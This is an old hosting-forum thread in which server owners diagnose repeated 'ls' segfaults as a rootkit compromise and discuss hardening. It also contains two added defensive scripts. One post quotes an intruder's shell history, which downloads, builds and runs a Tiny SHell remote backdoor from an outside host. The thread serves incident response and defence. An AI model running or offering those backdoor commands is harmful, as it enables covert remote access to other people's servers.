The Community Forums


ls segmentation fault

Discussion in 'General Discussion' started by mitul, Feb 27, 2003.

  1. mitul

    mitul Well-Known Member

    Joined:
    Feb 8, 2003
    Messages:
    291
    Likes Received:
    0
    Trophy Points:
    16
    Hello All,

    I get "Segmentation Fault (Core Dumped)" when I execute the "ls" command.
    I re-installed fileutils from the panel and it installed fileutils-4.1-10.1.

    Then ls worked for me, but after some time it fired the same error again.

    When I again re-installed fileutils it worked for some time, let's say 5 to 7 attempts, i.e. I can execute ls 5 to 7 times and it works, but then the same problem again.

    This has been a repeating problem for me. Any help would be appreciated.

    Help me, please.

    Thank you in advance.

    I am on Redhat 7.3 and WHM/cPanel 6.0

    Regards,

    :confused: :confused: :confused: :confused: :( ;) :p :mad: :confused: :confused:
     
  2. infinityws

    I got the same problem. Anyone got a fix?
     
  3. vishal

    HMMmmmm... Serious

    Hello,

    This is a very serious problem!!! It simply means that your server has been compromised somehow. (I may be wrong!!!) But I am 90% sure it has been compromised.

    Get chkrootkit and see the results (be careful if it says 'bindshell: INFECTED', but don't worry).

    Check the port and the service running on that port (it might be portmap or portsentry). If the only output from chkrootkit is 'bindshell: INFECTED' then you might be safe.

    Check the whole server thoroughly!!!!

    Be careful !!!!

    Regards,

    :D
     
  4. Website Rob

    I would suggest you take the Server offline -- now.

    I, too, strongly believe your Server has been cracked. You can further verify by running 'netstat' -- if it is not found or also does a 'core dump', it's safe to say you have been hacked. The "Core Dump" msg. will appear on a regular basis for certain commands, like netstat, ps, top, df. Crackers use this command to remove traces of what they have been doing, although they know the command to prevent it, because they've set it up that way.

    It's a bummer and a big PITA, but there is no way around it: you cannot be absolutely sure all traces have been removed until the hard drive is re-formatted or looked at by someone experienced in this area. Every day you wait, you are giving someone else access to your Server to do... who knows what.

    Just noticed the date of the first post. :rolleyes:
    Although this information is probably no good to them now, hopefully it will help others in the future -- whenever they see that dreaded msg: Core Dump, and wonder what it means.
     
    #4 Website Rob, Apr 18, 2003
    Last edited: Apr 18, 2003
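Website Rob's list of commands that start dumping core on a cracked host, and rnh's later question about checking MD5s of binaries, point at the same defensive control: a checksum baseline of the critical binaries, taken while the host is known clean and re-checked later. The script below is an added example, not code from the thread or from cPanel; the binary list, the baseline path and the use of sha256sum are assumptions.

```shell
#!/bin/sh
# Added example, not code from the thread or from cPanel: a minimal integrity
# baseline for the binaries this thread says break on a trojaned host.
# take_baseline records a checksum per file; verify_baseline reports any file
# whose checksum no longer matches (or which is gone). BINARIES and BASELINE
# are assumed defaults; override them in the environment.

BINARIES="${BINARIES:-/bin/ls /bin/ps /bin/netstat /usr/bin/top /bin/df}"
BASELINE="${BASELINE:-/root/bin-baseline.sha256}"

# Record "checksum  path" for every listed file that exists.
take_baseline() {
    : > "$BASELINE"
    for f in $BINARIES; do
        if [ -f "$f" ]; then
            sha256sum "$f" >> "$BASELINE"
        fi
    done
}

# Re-hash every file in the baseline. Prints one line per problem
# (CHANGED or MISSING) and returns 1 if there was any, 0 if all match.
verify_baseline() {
    problems=0
    while read -r expected path; do
        [ -n "$path" ] || continue
        if [ ! -f "$path" ]; then
            echo "MISSING $path"
            problems=1
            continue
        fi
        actual=$(sha256sum "$path" | cut -d' ' -f1)
        if [ "$actual" != "$expected" ]; then
            echo "CHANGED $path"
            problems=1
        fi
    done < "$BASELINE"
    return "$problems"
}
```

Take the baseline right after a clean install and keep a copy off the host; if the machine is already suspect, run the check from rescue media with known-clean tools, because a rootkit that replaces ls can just as easily replace sha256sum and the baseline file.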
  5. infinityws

    Yeah, I was hacked. I'm beginning to hate Cpanel. Nothing but exploits and issues.

    And yeah, I was totally up to date on all software.
     
  6. vishal

    what exploited you ???

    Hello,

    How did you come to know that you are hacked? Is it a rootkit??

    Check this out:
    http://www.soohrt.org
    Maybe it will help you!!! :)

    Let me know if you have any major problems, maybe I can help out!!!!

    (I had been a victim)

    Regards,
     
  7. sexy_guy

    Well, I get core dump messages usually after the completion of /scripts/easyapache/ unless I restart Apache with /etc/rc.d/init.d/httpd restart. I suspect that is because the final part of the installation attempts to restart Apache, but that doesn't work properly, so unless you start Apache manually immediately after the rebuild you will see segmentation and core dump error msgs. Pages of it. But I do not get these msgs with ls, top, netstat, etc.

    [Mon Apr 14 03:43:38 2003] [notice] child pid 10154 exit signal Segmentation fault (11)
    [Mon Apr 14 03:43:39 2003] [notice] child pid 20098 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
    [Mon Apr 14 03:43:39 2003] [notice] child pid 10155 exit signal Segmentation fault (11)
    [Mon Apr 14 03:43:40 2003] [notice] child pid 20233 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
    [Mon Apr 14 03:43:40 2003] [notice] child pid 20232 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
    [Mon Apr 14 03:43:42 2003] [notice] child pid 20374 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
    [Mon Apr 14 03:43:42 2003] [notice] child pid 26474 exit signal Segmentation fault (11)
     
  8. Radio_Head

    Were you providing a Cpanel demo on your site? If yes, it was BAD ..
    Were you providing SSH? If yes, it was BAD ..
    Was PHP safe mode off? If yes, it was BAD ..
     
  9. infinityws

    No Demo
    SSH was activated on some accounts
    Whatever the default is for PHP safe mode, that is what it is set to.

    Anyhow, the only accounts on the site were mine, with a few having SSH access.
     
  10. rnh

    As long as you have secure passwords (i.e. "E5d982kjhsGkjh9" as opposed to "password") the SSH shouldn't be a problem, since you're the only person with access to the server.

    However, there are a few PHP scripts out there that have had vulnerabilities over the years, so if you're using some outdated PHP scripts of some sort that could cause problems, especially if you have PHP safe mode off (Cpanel's default).

    If you don't know how they got in, and if you do not know all of the PHP scripts that you have installed, you might want to do a grep through the PHP files for functions like "readfile", "passthrough", "fopen", "fwrite" and "fread", and other functions like that that could be used to access other files on your server.

    CGI files have been used to exploit servers as well: scripts that did not check user input and wrote to files, where the user's input was changed to make the CGI files write to passwd files to change passwords, add users and other things like that that they can do to gain access.

    Also, did you have Anonymous FTP enabled?

    Otherwise it was probably just a vulnerability in some program, but cPanel seems to keep pretty up2date on patches and whatnot, so I can't imagine that cPanel servers get r00ted that often on common software vulnerabilities.
     
  11. infinityws

    Well, about 2 weeks before today I went through all accounts and turned off anonymous FTP, as no one needed it.

    But I believe they got in through the ptrace exploit. Apparently, the .20 kernel upgrade doesn't give you any info as to whether the other patches were applied, so I had no idea. But I learn from my mistakes and I'll be sure to triple check that all patches have been installed.

    But I've read of many cpanel exploits; it's just my first time with a server using cpanel, and in less than a month it's been compromised. Never happened before.
     
  12. parhelic

  13. rnh

    Man... sorry to hear about your misfortune.

    Was this done from a remote server and not by SSH enabled users on your own server?

    Man, glad I switched to FreeBSD... at least for now I am...

    What version of Linux were you running? Was it up to date?
     
    #13 rnh, Apr 19, 2003
    Last edited: Apr 19, 2003
  14. rnh

    I take that back... looking at that file again, the person has to have SSH access initially in order to execute that file, which opens port 60000 for them to access with elevated privileges...

    Did the script bypass a firewall closing off all unused ports or did you not have a firewall?
     
  15. parhelic

    It probably was a local user, and it's been a nightmare for the past week trying to clean this mofo out. Here's some of what he did from .bash_history once he rooted us:

    941 wget ftp://rt.fm/pub/OpenBSD/OpenSSH/portable/openssh-3.6.1p1.tar.gz
    942 tar zxvf openssh-3.6.1p1.tar.gz
    943 cd openssh-3.6.1p1
    944 ls
    945 ./configure --prefix=/usr --sysconfdir=/etc/ssh/ --with-tcp-wrappers
    946 make
    947 ls
    948 rm /usr/sbin/sshd
    949 make install
    950 cd ..
    951 ls
    952 wget http://www.cr0.net:8040/code/network/tsh-0.52.tar.gz
    953 wget http://www.cr0.net:8040/code/network/tsh-0.42.tar.gz
    954 ls
    955 rm tsh-0.52.tar.gz
    956 tar zxvf tsh-0.42.tar.gz
    957 cd tsh-0.42
    958 ls
    959 make linux
    960 ls
    961 ./tshd

    This is what happened last night. Previously in the week we thought we had him taken care of: we blocked his subnet at our router, we removed his Ambient's rootkit (ARK), removed his /home/user accounts and his entries in /etc/passwd, /etc/shadow, and /etc/group. Following that we edited /etc/passwd and switched everyone on all of our servers from /bin/bash to /usr/local/cpanel/bin/jailshell, and we removed all of the /root/.ssh keys as well. Apparently we didn't clean him out completely.

    All of the servers which were hacked were running the latest build of Cpanel, they were all completely up2date, running Redhat 8.0 with the latest stable kernel 2.4.18-27.8.0.

    *sigh*
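The extra listener in the two posts above (port 60000 in rnh's reading of the file, and the shell daemon started at the end of the .bash_history) is the kind of thing a listening-port allow list catches on a routine check. The script below is an added example, not code from the thread or from cPanel; the ALLOWED_PORTS default and the netstat sample are constructed assumptions.

```shell
#!/bin/sh
# Added example, not code from the thread or from cPanel: compare the TCP ports
# a host is listening on against the services you expect to be there, the kind
# of check that would have shown the extra listener described in the posts above.
# ALLOWED_PORTS is an assumed default (22 SSH, 80 web, 2082/2086 cPanel/WHM);
# set it to match your own host.

ALLOWED_PORTS="${ALLOWED_PORTS:-22 80 2082 2086}"

# Read "netstat -tln"-style lines on stdin; print one line for every LISTEN
# socket whose local port is not in ALLOWED_PORTS. Returns 1 if any were found.
unexpected_listeners() {
    found=0
    while read -r proto recvq sendq laddr faddr state; do
        [ "$state" = "LISTEN" ] || continue   # skips headers and non-listening rows
        port=${laddr##*:}                      # "0.0.0.0:60000" -> "60000"
        case " $ALLOWED_PORTS " in
            *" $port "*) ;;                    # an expected service
            *) echo "UNEXPECTED $proto $laddr"; found=1 ;;
        esac
    done
    return "$found"
}

# Constructed sample output (not from any real host): sshd, httpd and cPanel on
# their usual ports plus one listener on 60000, the port post #14 mentions.
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2082            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:60000           0.0.0.0:*               LISTEN'

# Stand-alone demo over the sample; on a live host pipe real output instead:
#   netstat -tln | unexpected_listeners
demo() {
    printf '%s\n' "$SAMPLE_NETSTAT" | unexpected_listeners
}

demo || echo "unexpected listeners found"
```

The check only sees what the kernel reports through netstat; on a host where netstat itself dumps core or has been replaced, run it from rescue media or compare against a packet capture taken from another machine.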
     
  16. rnh

    Does Cpanel have a way to prevent users from compiling?

    In Ensim no one could compile unless you gave them a "development tools package".

    Does he keep getting access to the same server? I dunno much about KLMs, but isn't Cpanel supposed to check MD5s and stuff like that to look for dirty binaries?
     
  17. FWC

    The brute force way is to chmod the C compilers. Run:

    chmod 000 /usr/bin/*cc*

    Then when you need to compile Apache or something else you can do:

    chmod 700 /usr/bin/*cc*

    and switch it back when you are done.
     
  18. shaun

    Users do have access to compile by default. The OS by default gives users this ability. You could chmod 750 (or 700) your compilers. I wouldn't 000 them.

    If you run in a jail'd env they still have access to these compilers BUT they don't have a lot of the libraries needed to compile exploits (Good Thinking Nick :) ).
     
  19. FWC

    Good point. If 700 isn't good enough you've already got some serious trouble. :eek:
     
  20. infinityws

    If you block port 22, can root still gain access through SSH? If not, how does root compile or control things?

    What about SFTP? Does that still work?
     